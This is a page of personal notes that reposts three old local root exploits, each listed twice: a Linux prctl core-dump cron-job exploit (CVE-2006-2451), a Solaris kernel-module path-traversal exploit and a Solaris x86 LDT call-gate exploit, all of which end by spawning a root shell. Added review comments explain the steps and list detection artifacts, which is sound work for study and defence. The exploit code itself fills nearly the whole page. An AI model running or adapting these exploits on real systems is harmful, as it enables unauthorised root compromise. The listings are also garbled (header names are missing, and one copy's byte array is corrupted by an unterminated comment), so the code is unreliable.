笔记摘录
/*****************************************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer (main PoC code) */
/* - RoMaNSoFt (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/
#include
#include
#include
#include
#include
#include
#include
#include
/*
 * Crontab fragment kept only as data in the process image: no code below
 * references it, so it exists to be carried along into the child's core file
 * (a core file is a copy of process memory). The cron line copies /bin/sh to
 * /tmp/sh, marks that copy setuid root (chmod 4755) and removes
 * /etc/cron.d/core -- which is where the core file is evidently expected to
 * land. Those three paths are the on-disk artifacts a defender can check for.
 */
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
/*
 * Entry point. Exercises the core-dump handling bug named in the file header
 * (CVE-2006-2451; header gives the affected range as >= 2.6.13 and < 2.6.17.4).
 *
 * Visible behaviour, step by step:
 *  - raises RLIMIT_CORE to RLIM_INFINITY so a core file may be written;
 *  - forks; the child moves to /etc/cron.d, calls prctl(PR_SET_DUMPABLE, 2)
 *    and sleeps;
 *  - the parent sends the child SIGSEGV, waits 62 s, then runs /tmp/sh -p.
 * The global `payload` (a crontab fragment) is never referenced here; see the
 * comment on it for the paths it touches.
 *
 * Review notes:
 *  - Return values of setrlimit(), chdir(), prctl(), fork() and kill() are all
 *    unchecked. If fork() fails, child == -1 and kill(-1, SIGSEGV) below
 *    signals every process the caller is permitted to signal.
 *  - The `#include` lines lost their header names during extraction, so the
 *    listing does not compile as shown.
 *  - Detection: a file named core under /etc/cron.d, a root cron job sourced
 *    from an unexpected file, and a setuid-root copy of /bin/sh in /tmp.
 */
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n");
/* unlimited core size; result of setrlimit() not checked */
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entry\n");
/* child: cwd becomes /etc/cron.d before it is made dumpable */
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200); /* keeps the child alive until the parent signals it */
exit(1);
}
/* parent: force a core dump of the child (child == -1 here if fork failed) */
kill(child, SIGSEGV);
printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
sleep(62); /* allows one cron minute to elapse */
printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
system("/tmp/sh -p"); /* the copy created by the cron line in `payload` */
}
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer */
/* - RoMaNSoFt */
/* [ 10.Jul.2006 ] */
/*****************************************************/
#include
#include
#include
#include
#include
#include
#include
#include
/*
 * Crontab fragment kept only as data in the process image: no code below
 * references it, so it exists to be carried along into the child's core file
 * (a core file is a copy of process memory). The cron line copies /bin/sh to
 * /tmp/sh, marks that copy setuid root (chmod 4755) and removes
 * /etc/cron.d/core -- which is where the core file is evidently expected to
 * land. Those three paths are the on-disk artifacts a defender can check for.
 */
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
/*
 * Entry point (second, duplicated copy of the same listing). Exercises the
 * core-dump handling bug named in the file header (CVE-2006-2451; header gives
 * the affected range as >= 2.6.13 and < 2.6.17.4).
 *
 * Visible behaviour, step by step:
 *  - raises RLIMIT_CORE to RLIM_INFINITY so a core file may be written;
 *  - forks; the child moves to /etc/cron.d, calls prctl(PR_SET_DUMPABLE, 2)
 *    and sleeps;
 *  - the parent sends the child SIGSEGV, waits 62 s, then runs /tmp/sh -p.
 * The global `payload` (a crontab fragment) is never referenced here.
 *
 * Review notes:
 *  - Return values of setrlimit(), chdir(), prctl(), fork() and kill() are all
 *    unchecked. If fork() fails, child == -1 and kill(-1, SIGSEGV) below
 *    signals every process the caller is permitted to signal.
 *  - The `#include` lines lost their header names during extraction, so the
 *    listing does not compile as shown.
 *  - Detection: a file named core under /etc/cron.d, a root cron job sourced
 *    from an unexpected file, and a setuid-root copy of /bin/sh in /tmp.
 */
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n");
/* unlimited core size; result of setrlimit() not checked */
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entry\n");
/* child: cwd becomes /etc/cron.d before it is made dumpable */
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200); /* keeps the child alive until the parent signals it */
exit(1);
}
/* parent: force a core dump of the child (child == -1 here if fork failed) */
kill(child, SIGSEGV);
printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
sleep(62); /* allows one cron minute to elapse */
printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
system("/tmp/sh -p"); /* the copy created by the cron line in `payload` */
}
/* rootme.c - Solaris vfs_getvfssw() Loadable Kernel Module Path Traversal Exploit
*
* Copyright (c) SST 2004 All rights reserved.
*
* Public version
*
* code by Sam and 2004/04/07
*
*
*
* bug find by Dave Aitel
* http://www.immunitysec.com/downloads/solaris_kernel_vfs.sxw.pdf
*
*
* some thanks/greets to:
* sst members, Xfocus Guys, my gf :I
* and everyone else who's KNOW SST ;P
* http://0x557.org
*/
#include
#include
#include
#include
#include
/*
 * Child-side step. Creates /tmp/sparcv9 with mode 0777 (world-writable),
 * copies a module file named ./mod (not part of this listing) into it, and
 * then calls sysfs(GETFSIND, "../../tmp/mod"). The "../../" in that
 * filesystem-type name is the path traversal the file header refers to
 * (vfs_getvfssw()); per the header it is meant to make the kernel load a module
 * from outside its normal module location. Returns -1 if mkdir() fails (after
 * perror()), otherwise 0.
 *
 * Review notes: system() is invoked with a relative source path and its result
 * is ignored; the sysfs() return value is not checked either. The header
 * credits Dave Aitel's advisory for the underlying bug. The `#include` lines
 * lost their header names during extraction.
 */
int do_root_me ()
{
if (mkdir("/tmp/sparcv9", 0777) < 0) {
perror ("mkdir");
return -1;
}
system ("cp ./mod /tmp/sparcv9/"); /* unchecked; ./mod is relative to cwd */
sysfs (GETFSIND, "../../tmp/mod"); /* traversal string passed as an fs type name */
return 0;
}
/*
 * Builds a helper binary from sh.c (not part of this listing), copies it to
 * /tmp/sh and sets mode 4755 on the copy. Always returns 0; the result of
 * system() is not checked, so a failed compile is not reported here.
 * Detection artifact: a setuid binary named /tmp/sh.
 */
int make_shell ()
{
system ("gcc -o sh sh.c;cp ./sh /tmp/sh;chmod 4755 /tmp/sh");
return 0;
}
/*
 * Entry point. Stages /tmp/sh via make_shell(), forks, and lets the child run
 * do_root_me(). Both processes then remove /tmp/sparcv9, wait for a keypress
 * and exec /tmp/sh.
 *
 * Review notes (all visible in the code below):
 *  - The child neither exits nor returns after do_root_me(), so parent and
 *    child both fall through to the rm -rf, getchar() and execl().
 *  - A fork() failure only prints a message; execution continues as if in
 *    the parent.
 *  - There is no wait() on the child, so the parent's rm -rf can race the
 *    child's mkdir()/cp.
 *  - execl()'s argument list is terminated with a bare 0 instead of
 *    (char *)0 / NULL; an int is passed where a pointer is expected, which
 *    is not a valid terminator on 64-bit targets.
 */
int main()
{
pid_t child;
make_shell ();
child = fork ();
if (child == -1)
printf ("Unable to fork\n"); /* not fatal: falls through */
if (child == 0)
do_root_me(); /* child continues past this point as well */
system("/usr/bin/rm -rf /tmp/sparcv9"); /* runs in both processes; no wait() first */
printf ("press anykey ");
getchar ();
execl ("/tmp/sh", "/tmp/sh", 0); /* terminator should be (char *)0 */
return 0;
}
/* rootme.c - Solaris vfs_getvfssw() Loadable Kernel Module Path Traversal Exploit
* Copyright (c) SST 2004 All rights reserved.
*
* Public version
*
* code by Sam and 2004/04/07
*
*
*
* bug find by Dave Aitel
* http://www.immunitysec.com/downloads/solaris_kernel_vfs.sxw.pdf
*
*
* some thanks/greets to:
* sst members, Xfocus Guys, my gf :I
* and everyone else who's KNOW SST ;P
* http://0x557.org
*/
#include
#include
#include
#include
#include
/*
 * Child-side step (duplicated copy). Creates /tmp/sparcv9 with mode 0777
 * (world-writable), copies a module file named ./mod (not part of this
 * listing) into it, and then calls sysfs(GETFSIND, "../../tmp/mod"). The
 * "../../" in that filesystem-type name is the path traversal the file header
 * refers to (vfs_getvfssw()). Returns -1 if mkdir() fails (after perror()),
 * otherwise 0.
 *
 * Review notes: system() is invoked with a relative source path and its result
 * is ignored; the sysfs() return value is not checked either. The `#include`
 * lines lost their header names during extraction.
 */
int do_root_me ()
{
if (mkdir("/tmp/sparcv9", 0777) < 0) {
perror ("mkdir");
return -1;
}
system ("cp ./mod /tmp/sparcv9/"); /* unchecked; ./mod is relative to cwd */
sysfs (GETFSIND, "../../tmp/mod"); /* traversal string passed as an fs type name */
return 0;
}
/*
 * Builds a helper binary from sh.c (not part of this listing), copies it to
 * /tmp/sh and sets mode 4755 on the copy. Always returns 0; the result of
 * system() is not checked, so a failed compile is not reported here.
 * Detection artifact: a setuid binary named /tmp/sh.
 */
int make_shell ()
{
system ("gcc -o sh sh.c;cp ./sh /tmp/sh;chmod 4755 /tmp/sh");
return 0;
}
/*
 * Entry point (duplicated copy). Stages /tmp/sh via make_shell(), forks, and
 * lets the child run do_root_me(). Both processes then remove /tmp/sparcv9,
 * wait for a keypress and exec /tmp/sh.
 *
 * Review notes (all visible in the code below):
 *  - The child neither exits nor returns after do_root_me(), so parent and
 *    child both fall through to the rm -rf, getchar() and execl().
 *  - A fork() failure only prints a message; execution continues as if in
 *    the parent.
 *  - There is no wait() on the child, so the parent's rm -rf can race the
 *    child's mkdir()/cp.
 *  - execl()'s argument list is terminated with a bare 0 instead of
 *    (char *)0 / NULL; an int is passed where a pointer is expected, which
 *    is not a valid terminator on 64-bit targets.
 */
int main()
{
pid_t child;
make_shell ();
child = fork ();
if (child == -1)
printf ("Unable to fork\n"); /* not fatal: falls through */
if (child == 0)
do_root_me(); /* child continues past this point as well */
system("/usr/bin/rm -rf /tmp/sparcv9"); /* runs in both processes; no wait() first */
printf ("press anykey ");
getchar ();
execl ("/tmp/sh", "/tmp/sh", 0); /* terminator should be (char *)0 */
return 0;
}
老东西 随便记录一下
/*## copyright LAST STAGE OF DELIRIUM apr 2001 poland *://lsd-pl.net/ #*/
/*## ldt kernel bug #*/
/* the code installs trap call gate descriptor with DPL=3 targeting kernel */
/* code segment selector KCSSEL (DPL=0) in task local descriptor table LDT */
/* through sysi86(SI86DSCR,struct ssd*) system call. */
/* as a result command shell is spawned with effective root user privilege. */
/* NOTE: possible direct jump to user space adr=(unsigned int)&asmcode[21]; */
#include
#include
#include
#include
#include
#include
#include
/*
 * Helper macros used to assemble the `asmcode` byte array below.
 *  ofs(s,m)  offset of member m within struct s via the null-pointer trick;
 *            same intent as offsetof(), but dereferencing a null pointer this
 *            way is undefined behaviour in strict C.
 *  ofskt()/ofscr()/ofsid()  offsets of cpu_t.cpu_thread, kthread_t.t_cred and
 *            cred_t.cr_uid -- presumably from Solaris kernel headers (the
 *            `#include` names were lost in extraction), so the bytes emitted
 *            depend on the exact kernel build this is compiled against.
 *  adr(a)    emits a 32-bit value as four little-endian bytes; dsc(d) emits a
 *            16-bit selector as two bytes. Both evaluate their argument more
 *            than once and do not parenthesize it.
 */
#define ofs(s,m) (unsigned int)(&(((s*)0)->m))
#define ofskt() (ofs(cpu_t,cpu_thread))
#define ofscr() (ofs(kthread_t,t_cred))
#define ofsid() (ofs(cred_t,cr_uid))
#define adr(a) (char)(a),(char)(a>>8),(char)(a>>16),(char)(a>>24)
#define dsc(d) (char)(d),(char)(d>>8)
/*
 * Machine code that main() invokes as a function. Per the per-instruction
 * comments: the bytes up to `ret` run in user mode and perform `lcall $0x44`
 * through the call gate main() installs with sysi86(); the bytes from `movw`
 * onward (offset 21, see the header NOTE about &asmcode[21]) load KGSSEL into
 * %gs, follow cpu_thread -> t_cred and store zero at the cr_uid offset, then
 * `lret $0x20`. How control reaches offset 21 depends on the gate base that
 * main() derives from %esp; that arithmetic is not explained on the page.
 * All offsets and selectors come from the macros above and therefore from the
 * kernel headers this was built against.
 */
char asmcode[]={
0x55, /* pushl %ebp */
0x89,0xe5, /* movl %esp,%ebp */
0xe8,0,0,0,0, /* call */
0x5c, /* popl %esp */
0x83,0xc4,0x0d, /* addl $0x0d,%esp */
0x9a,0,0,0,0,0x44,0, /* lcall $0x44,$0x00000000 */
0xc9, /* leave */
0xc3, /* ret */
0x66,0xb8,dsc(KGSSEL), /* movw $0x????,%ax */
0x8e,0xe8, /* movw %ax,%gs */
0x65,0xa1,adr(ofskt()), /* movl %gs:0x????????,%eax */
0x8b,0x88,adr(ofscr()), /* movl 0x????????(%eax),%ecx */
0x31,0xc0, /* xorl %eax,%eax */
0x89,0x41,ofsid(), /* movl %eax,0x??(%ecx) */
0xca,0x20,0 /* lret $0x20 */
};
/*
 * Entry point (implicit int, pre-C99 style; argc/argv are unused). Per the
 * file header: builds a 386 call-gate descriptor with a user-accessible DPL
 * (GATE_UACC|GATE_386CALL) at LDT selector 0x44 whose target segment is the
 * kernel code selector KCSSEL, installs it with sysi86(SI86DSCR, &s), calls
 * `asmcode` as a function, calls setuid(getuid()), and execs /bin/ksh.
 *
 * `adr` is derived from the %esp value read through getcontext(); the
 * constant arithmetic (+12+4+4-(8<<2)) matches a stack layout the author
 * observed and is not explained on the page. `s.acc2 = 8` is presumably the
 * gate's parameter count -- NOTE(review): confirm against the definition of
 * struct ssd.
 *
 * Review notes: the sysi86() result is not checked, and the execl() argument
 * list ends with a bare 0 rather than (char *)0. Banner gives the affected
 * systems as Solaris 2.7/2.8 x86. Detection: sysi86(SI86DSCR) use by
 * non-system software, and a ksh running as uid 0 under an unprivileged login.
 */
main(int argc,char **argv){
unsigned int adr;
ucontext_t uc;struct ssd s;
printf("copyright LAST STAGE OF DELIRIUM apr 2001 poland //lsd-pl.net/\n");
printf("ldt kernel bug for solaris 2.7 2.8 x86\n\n");
getcontext(&uc);
/* gate base derived from the current stack pointer (layout-specific) */
adr=uc.uc_mcontext.gregs[ESP]+12+4+4-(8<<2);
printf("esp=0x%08x adr=0x%08x\n",uc.uc_mcontext.gregs[ESP],adr);
s.bo=adr;
s.sel=0x44; /* LDT selector the gate is installed at */
s.ls=KCSSEL; /* target: kernel code segment (DPL=0 per header) */
s.acc1=GATE_UACC|GATE_386CALL; /* user-callable 386 call gate */
s.acc2=8; /* presumably the parameter count -- confirm */
sysi86(SI86DSCR,&s); /* result unchecked */
setuid(getuid()); /* presumably reads the cr_uid that asmcode zeroed -- confirm */
((void(*)())asmcode)(); /* executes the byte array above as code */
execl("/bin/ksh","lsd",0); /* terminator should be (char *)0 */
}
/*## copyright LAST STAGE OF DELIRIUM apr 2001 poland *://lsd-pl.net/ #*/
/*## ldt kernel bug #*/
/* the code installs trap call gate descriptor with DPL=3 targeting kernel */
/* code segment selector KCSSEL (DPL=0) in task local descriptor table LDT */
/* through sysi86(SI86DSCR,struct ssd*) system call. */
/* as a result command shell is spawned with effective root user privilege. */
/* NOTE: possible direct jump to user space adr=(unsigned int)&asmcode[21]; */
#include
#include
#include
#include
#include
#include
#include
/*
 * Helper macros used to assemble the `asmcode` byte array below (duplicated
 * copy of the listing).
 *  ofs(s,m)  offset of member m within struct s via the null-pointer trick;
 *            same intent as offsetof(), but dereferencing a null pointer this
 *            way is undefined behaviour in strict C.
 *  ofskt()/ofscr()/ofsid()  offsets of cpu_t.cpu_thread, kthread_t.t_cred and
 *            cred_t.cr_uid -- presumably from Solaris kernel headers (the
 *            `#include` names were lost in extraction), so the bytes emitted
 *            depend on the exact kernel build this is compiled against.
 *  adr(a)    emits a 32-bit value as four little-endian bytes; dsc(d) emits a
 *            16-bit selector as two bytes. Both evaluate their argument more
 *            than once and do not parenthesize it.
 */
#define ofs(s,m) (unsigned int)(&(((s*)0)->m))
#define ofskt() (ofs(cpu_t,cpu_thread))
#define ofscr() (ofs(kthread_t,t_cred))
#define ofsid() (ofs(cred_t,cr_uid))
#define adr(a) (char)(a),(char)(a>>8),(char)(a>>16),(char)(a>>24)
#define dsc(d) (char)(d),(char)(d>>8)
/*
 * Machine code that main() invokes as a function (duplicated copy of the
 * listing). Per the per-instruction comments: the bytes up to `ret` run in
 * user mode and perform `lcall $0x44` through the call gate main() installs
 * with sysi86(); the bytes from `movw` onward load KGSSEL into %gs, follow
 * cpu_thread -> t_cred and store zero at the cr_uid offset, then `lret $0x20`.
 * NOTE(review): in this copy the comment on the `call` line is unterminated,
 * so the following `0x5c` (popl %esp) line is swallowed by that comment and
 * the array differs from the first copy of the listing on this page.
 */
char asmcode[]={
0x55, /* pushl %ebp */
0x89,0xe5, /* movl %esp,%ebp */
0xe8,0,0,0,0, /* call
0x5c, /* popl %esp */
0x83,0xc4,0x0d, /* addl $0x0d,%esp */
0x9a,0,0,0,0,0x44,0, /* lcall $0x44,$0x00000000 */
0xc9, /* leave */
0xc3, /* ret */
0x66,0xb8,dsc(KGSSEL), /* movw $0x????,%ax */
0x8e,0xe8, /* movw %ax,%gs */
0x65,0xa1,adr(ofskt()), /* movl %gs:0x????????,%eax */
0x8b,0x88,adr(ofscr()), /* movl 0x????????(%eax),%ecx */
0x31,0xc0, /* xorl %eax,%eax */
0x89,0x41,ofsid(), /* movl %eax,0x??(%ecx) */
0xca,0x20,0 /* lret $0x20 */
};
/*
 * Entry point (duplicated copy; implicit int, pre-C99 style; argc/argv are
 * unused). Per the file header: builds a 386 call-gate descriptor with a
 * user-accessible DPL (GATE_UACC|GATE_386CALL) at LDT selector 0x44 whose
 * target segment is the kernel code selector KCSSEL, installs it with
 * sysi86(SI86DSCR, &s), calls `asmcode` as a function, calls setuid(getuid()),
 * and execs /bin/ksh.
 *
 * `adr` is derived from the %esp value read through getcontext(); the
 * constant arithmetic (+12+4+4-(8<<2)) matches a stack layout the author
 * observed and is not explained on the page. `s.acc2 = 8` is presumably the
 * gate's parameter count -- NOTE(review): confirm against the definition of
 * struct ssd.
 *
 * Review notes: the sysi86() result is not checked, and the execl() argument
 * list ends with a bare 0 rather than (char *)0. Banner gives the affected
 * systems as Solaris 2.7/2.8 x86. Detection: sysi86(SI86DSCR) use by
 * non-system software, and a ksh running as uid 0 under an unprivileged login.
 */
main(int argc,char **argv){
unsigned int adr;
ucontext_t uc;struct ssd s;
printf("copyright LAST STAGE OF DELIRIUM apr 2001 poland //lsd-pl.net/\n");
printf("ldt kernel bug for solaris 2.7 2.8 x86\n\n");
getcontext(&uc);
/* gate base derived from the current stack pointer (layout-specific) */
adr=uc.uc_mcontext.gregs[ESP]+12+4+4-(8<<2);
printf("esp=0x%08x adr=0x%08x\n",uc.uc_mcontext.gregs[ESP],adr);
s.bo=adr;
s.sel=0x44; /* LDT selector the gate is installed at */
s.ls=KCSSEL; /* target: kernel code segment (DPL=0 per header) */
s.acc1=GATE_UACC|GATE_386CALL; /* user-callable 386 call gate */
s.acc2=8; /* presumably the parameter count -- confirm */
sysi86(SI86DSCR,&s); /* result unchecked */
setuid(getuid()); /* presumably reads the cr_uid that asmcode zeroed -- confirm */
((void(*)())asmcode)(); /* executes the byte array above as code */
execl("/bin/ksh","lsd",0); /* terminator should be (char *)0 */
}


2008/03/27
03:38


